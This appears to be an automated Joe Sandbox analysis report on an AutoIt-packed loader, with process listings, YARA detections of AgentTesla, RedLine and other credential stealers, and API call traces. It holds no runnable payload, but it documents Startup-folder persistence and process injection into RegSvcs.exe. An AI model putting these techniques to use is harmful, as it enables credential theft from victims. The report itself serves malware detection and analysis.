Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.3449507339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000002.3449507339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3452111397.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.3452111397.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3452111397.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:05:53
Start date:	04/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Imagebase:	0x7ff75d110000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:05:55
Start date:	04/05/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0x9c0000
File size:	116'515'840 bytes
MD5 hash:	2AE322D5CE2B39574F35D1EEE4788A83
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.3449893133.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000E.00000002.3449893133.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:05:55
Start date:	04/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0xc70000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3842075995.00000000032B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.3842075995.000000000330C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.3842075995.000000000328E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3842075995.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3842075995.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	2.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	64

Executed Functions

Function 00BB3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BB3B7A
IsDebuggerPresent.KERNEL32 ref: 00BB3B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,00C762F8,00C762E0,?,?), ref: 00BB3BFD

Part of subcall function 00BB7D2C: _memmove.LIBCMT ref: 00BB7D66

Part of subcall function 00BC0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00BB3C26,00C762F8,?,?,?), ref: 00BC0ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00BB3C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00C693F0,00000010), ref: 00BED4BC
SetCurrentDirectoryW.KERNEL32(?,00C762F8,?,?,?), ref: 00BED4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C65D40,00C762F8,?,?,?), ref: 00BED57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00BED581

Part of subcall function 00BB3A58: GetSysColorBrush.USER32(0000000F), ref: 00BB3A62
Part of subcall function 00BB3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00BB3A71
Part of subcall function 00BB3A58: LoadIconW.USER32(00000063), ref: 00BB3A88
Part of subcall function 00BB3A58: LoadIconW.USER32(000000A4), ref: 00BB3A9A
Part of subcall function 00BB3A58: LoadIconW.USER32(000000A2), ref: 00BB3AAC
Part of subcall function 00BB3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BB3AD2
Part of subcall function 00BB3A58: RegisterClassExW.USER32(?), ref: 00BB3B28

Part of subcall function 00BB39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BB3A15
Part of subcall function 00BB39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BB3A36
Part of subcall function 00BB39E7: ShowWindow.USER32(00000000,?,?), ref: 00BB3A4A
Part of subcall function 00BB39E7: ShowWindow.USER32(00000000,?,?), ref: 00BB3A53

Part of subcall function 00BB43DB: _memset.LIBCMT ref: 00BB4401
Part of subcall function 00BB43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BB44A6

Strings

runas, xrefs: 00BED575
This is a third-party compiled AutoIt script., xrefs: 00BED4B4

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: f45693f1eb7455bfcbf6877c379a86b0375d99f3477c19de577896ed17542894
Instruction ID: 7f35e0985fc95933ebf0abd8880efc1468aea1284c62e8b201a40f62e9dd5627
Opcode Fuzzy Hash: f45693f1eb7455bfcbf6877c379a86b0375d99f3477c19de577896ed17542894
Instruction Fuzzy Hash: 9D51B370908649ABCF11ABB4DC46FFD7BF9EB44700B0041F9F459A21A2DEF09A46CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00BB4B2B

Part of subcall function 00BB7D2C: _memmove.LIBCMT ref: 00BB7D66

GetCurrentProcess.KERNEL32(?,00C3FAEC,00000000,00000000,?), ref: 00BB4BF8
IsWow64Process.KERNEL32(00000000), ref: 00BB4BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00BB4C45
FreeLibrary.KERNEL32(00000000), ref: 00BB4C50
GetSystemInfo.KERNEL32(00000000), ref: 00BB4C81
GetSystemInfo.KERNEL32(00000000), ref: 00BB4C8D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 947189812654f4d8242737848c9b13c4baeb3cb05652941ccc67d4106b93dae1
Instruction ID: d5fcc79568a1c7cf1ac0458cbc3e167f4d10ddda2a2d2a260b4ab318af8d4d70
Opcode Fuzzy Hash: 947189812654f4d8242737848c9b13c4baeb3cb05652941ccc67d4106b93dae1
Instruction Fuzzy Hash: E091903194ABC0DBC731CB6895916BABFE4FF29300B544DDDD0CA93A42D3A0E908D759

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BB4EEE,?,?,00000000,00000000), ref: 00BB4FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BB4EEE,?,?,00000000,00000000), ref: 00BB5010
LoadResource.KERNEL32(?,00000000,?,?,00BB4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00BB4F8F), ref: 00BEDD60
SizeofResource.KERNEL32(?,00000000,?,?,00BB4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00BB4F8F), ref: 00BEDD75
LockResource.KERNEL32(00BB4EEE,?,?,00BB4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00BB4F8F,00000000), ref: 00BEDD88

Strings

SCRIPT, xrefs: 00BB5006

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: abe07850c4c50e474368d13bdac1ad43c1a30c3054813672ac1fd49b7d594d7a
Instruction ID: bb738ad864ef78889f84bf026e01f6d55bcf25cde4ab1730d783f2f26b020e99
Opcode Fuzzy Hash: abe07850c4c50e474368d13bdac1ad43c1a30c3054813672ac1fd49b7d594d7a
Instruction Fuzzy Hash: 78115E75600B04AFD7369B65DC58F6B7BB9EBC9B11F1085ACF40586260DBA2E8018661

Uniqueness

Uniqueness Score: -1.00%

Function 00C14696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00BEE7C1), ref: 00C146A6
FindFirstFileW.KERNELBASE(?,?), ref: 00C146B7
FindClose.KERNEL32(00000000), ref: 00C146C7

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 4d22f95477db6468927ebb7d4a1523e59011f0a4ea90e14380d90cac3c88fa93
Instruction ID: 52aa49bc01068d251a9ec026c143ee9d7d30fc4ea6c5a169c465aa50495d3909
Opcode Fuzzy Hash: 4d22f95477db6468927ebb7d4a1523e59011f0a4ea90e14380d90cac3c88fa93
Instruction Fuzzy Hash: C8E0D8328204019B42146738EC4D9EF775C9E07339F100B19F975C20F0E7B05D909595

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00BF428C

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: c9e518783011c2270ebcaf37e80a317be5d5ca3b05f8029cf8d192fc58777442
Instruction ID: fc3e2c4570c6fa8187c494da93cfe378974b380c23f48c6bf7ade92a60237043
Opcode Fuzzy Hash: c9e518783011c2270ebcaf37e80a317be5d5ca3b05f8029cf8d192fc58777442
Instruction Fuzzy Hash: C5A23D74A04205CBDB24CF58C880AFAB7F1FB48310F6485A9E926AB361D7B5ED45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BC0B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BC0BBB
timeGetTime.WINMM ref: 00BC0E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BC0FB3
TranslateMessage.USER32(?), ref: 00BC0FC7
DispatchMessageW.USER32(?), ref: 00BC0FD5
Sleep.KERNEL32(0000000A), ref: 00BC0FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 00BC105A
DestroyWindow.USER32 ref: 00BC1066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BC1080
Sleep.KERNEL32(0000000A,?,?), ref: 00BF52AD
TranslateMessage.USER32(?), ref: 00BF608A
DispatchMessageW.USER32(?), ref: 00BF6098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BF60AC

Strings

@GUI_CTRLID, xrefs: 00BF5364
@COM_EVENTOBJ, xrefs: 00BF591A
@TRAY_ID, xrefs: 00BF5BB9
@GUI_CTRLHANDLE, xrefs: 00BF540E
@GUI_WINHANDLE, xrefs: 00BF53B9

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: 2ecf92b882f17451ad744c26a8fbb6bb66052144b020be02c5966c4022815174
Instruction ID: 5481bb5c1f806d14118d4c6be6fe27fa387178c9a7119497f48907b138249ec0
Opcode Fuzzy Hash: 2ecf92b882f17451ad744c26a8fbb6bb66052144b020be02c5966c4022815174
Instruction Fuzzy Hash: D7B29D70608745DBD734DF24C884BBAB7E4FF84304F14499DE69A972A1DB71E888CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C193DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C191E9: __time64.LIBCMT ref: 00C191F3

Part of subcall function 00BB5045: _fseek.LIBCMT ref: 00BB505D

__wsplitpath.LIBCMT ref: 00C194BE

Part of subcall function 00BD432E: __wsplitpath_helper.LIBCMT ref: 00BD436E

_wcscpy.LIBCMT ref: 00C194D1
_wcscat.LIBCMT ref: 00C194E4
__wsplitpath.LIBCMT ref: 00C19509
_wcscat.LIBCMT ref: 00C1951F
_wcscat.LIBCMT ref: 00C19532

Part of subcall function 00C1922F: _memmove.LIBCMT ref: 00C19268
Part of subcall function 00C1922F: _memmove.LIBCMT ref: 00C19277

_wcscmp.LIBCMT ref: 00C19479

Part of subcall function 00C199BE: _wcscmp.LIBCMT ref: 00C19AAE
Part of subcall function 00C199BE: _wcscmp.LIBCMT ref: 00C19AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C196DC
_wcsncpy.LIBCMT ref: 00C1974F
DeleteFileW.KERNEL32(?,?), ref: 00C19785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C1979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C197AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C197BE

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 2c7da19761f5ad6c0bbddfb8f0ca49f31ec0786ec2f624d00536b7ecb91f908c
Instruction ID: 90be65e98d97408d1ec47720f6e8843d3a7a31e231b52fdf1c983cb95d362ca1
Opcode Fuzzy Hash: 2c7da19761f5ad6c0bbddfb8f0ca49f31ec0786ec2f624d00536b7ecb91f908c
Instruction Fuzzy Hash: C9C14CB1D00219ABCF21DF95CC81EEEB7BDEF45300F0040AAF609E6251EB709A849F65

Uniqueness

Uniqueness Score: -1.00%

Function 00BB3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BB3074
RegisterClassExW.USER32(00000030), ref: 00BB309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BB30AF
InitCommonControlsEx.COMCTL32(?), ref: 00BB30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BB30DC
LoadIconW.USER32(000000A9), ref: 00BB30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BB3101

Strings

TaskbarCreated, xrefs: 00BB30A4
0, xrefs: 00BB3056
AutoIt v3 GUI, xrefs: 00BB3090
+, xrefs: 00BB305D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 103128947337cb1b8f50a150484fdb87254058b7f074c1da3981c15e11ba36e2
Instruction ID: 0a184e8789be5648a10f9c6ba5e31ecba99480cb0af660644e5111fad698fced
Opcode Fuzzy Hash: 103128947337cb1b8f50a150484fdb87254058b7f074c1da3981c15e11ba36e2
Instruction Fuzzy Hash: AD3105B1C50309AFDB509FA8E889BCDBBF0FB09310F14492EE594E62A1D7B54585CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00BB3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BB3074
RegisterClassExW.USER32(00000030), ref: 00BB309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BB30AF
InitCommonControlsEx.COMCTL32(?), ref: 00BB30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BB30DC
LoadIconW.USER32(000000A9), ref: 00BB30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BB3101

Strings

TaskbarCreated, xrefs: 00BB30A4
0, xrefs: 00BB3056
AutoIt v3 GUI, xrefs: 00BB3090
+, xrefs: 00BB305D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: f19f6d13b4079128eb49fa363cf8097d542d0f4542b16128128613f6854af8b3
Instruction ID: 6a931d6279b137ef3fdec5a5d7ed6b0b8a0e345f26dd4a4948f61cecbb801dff
Opcode Fuzzy Hash: f19f6d13b4079128eb49fa363cf8097d542d0f4542b16128128613f6854af8b3
Instruction Fuzzy Hash: 7021C4B1D10318AFDB00DFA8ED89BDDBBF4FB09700F00452AF915A62A1D7B145858F91

Uniqueness

Uniqueness Score: -1.00%

Function 00BB71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

